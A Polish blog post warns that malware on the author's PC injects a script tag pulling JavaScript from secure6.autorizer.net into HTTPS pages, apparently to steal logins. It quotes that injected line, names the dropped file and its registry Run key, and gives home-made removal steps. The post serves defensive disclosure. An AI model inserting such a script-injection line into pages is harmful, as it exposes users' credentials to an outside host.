PROGRAMOWANIE i WEBMASTERKA

Informacje i porady dla programistów i webmasterów. Wersja bardzo beta

Autorizer.net – Uwaga, prawdopodobnie kradnie hasła

Zdaje się, że zła passa trwa. Wczoraj zauważyłem, że niektóre strony na moim komputerze ładują się bardzo wolno. Przyjrzałem się im i okazało się, że wolne ładowanie dotyczy tylko połączeń szyfrowanych ssl, co już wzbudziło mój niepokój. Okazało się też, że przy tych stronach przeglądarka (FireFox i IE) łączy się długo ze stroną autorizer.net. Autorizer.net okazało się świeżą domeną, zarejestrowaną w na Brytyjskich Wyspach Dziewiczych, a DNS-y wskazują na Rosję (chyba) – nie jest dobrze.

Co udało mi się odkryć:

W przeglądarkach FF i IE, wchodząc na stroną szyfrowaną (początek adresu https) w źródle strony zaraz za tytułem umieszczona jest linia:

"<script type="text/javascript" src="http://secure6.autorizer.net/?int"></script>"

Występuje to tylko w tych, wyżej wymienionych, przeglądarkach. Sprawdziłem też na innych komputerach – nie ma tam tej linii. Wniosek, coś cwanie doczepia do kodu strony linię javascriptu przekazującego dane z szyfrowanej strony. Ten syf jest raczej świeży, bo w internecie nie ma słowa o kłopotach z autorizer.net, a domena ma status nowej i nie wykazującej zagrożenia. Żaden antywirus nie rozpoznaje zagrożenia.

Jak się bronić

Ponieważ na razie nie mam pojęcia, co doczepia ten kod. Jedyne rady jakie mi przychodzą do głowy, to:

  • Wchodząc na strony https, przed zalogowaniem się, patrzeć w ich źródło, czy nie ma doczepionej linii autorizer’a. Jeśli jest to się nie logować.
  • Jeśli znalazłeś u siebie autorizera, to z innej porzeglądarki, bądź lepiej z innego komputera, pozmieniać hasła do serwisów, na które się logowałeś zarażoną przeglądarką

Na razie tyle, szpieguję szpiega dalej.

PS. Uwaga, dziś strony z autorizerem ładują się już dość szybko (nie widać spowolnienia), mimo że złośliwy kod dalej siedzi.

EDYCJA:
Winowajca namierzony, oto on:

Siedzi w:

C:\Users\[nazwa-uzytkownika]\AppData\Roaming\Taoz\udaz.exe

Startuje z rejestru

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run klucz: Wuodypumyq wartość: ścieżka jak wyżej

Żeby go usunąć należy najpierw skasować plik udaz.exe albo zmienić nazwę, zrestartować komp i usunąć klucze z rejestru.

Jakiś proces startowany przez udaz.exe odświeża rejestr i samo usunięcie z Run;a nic nie daje

Komentuj

*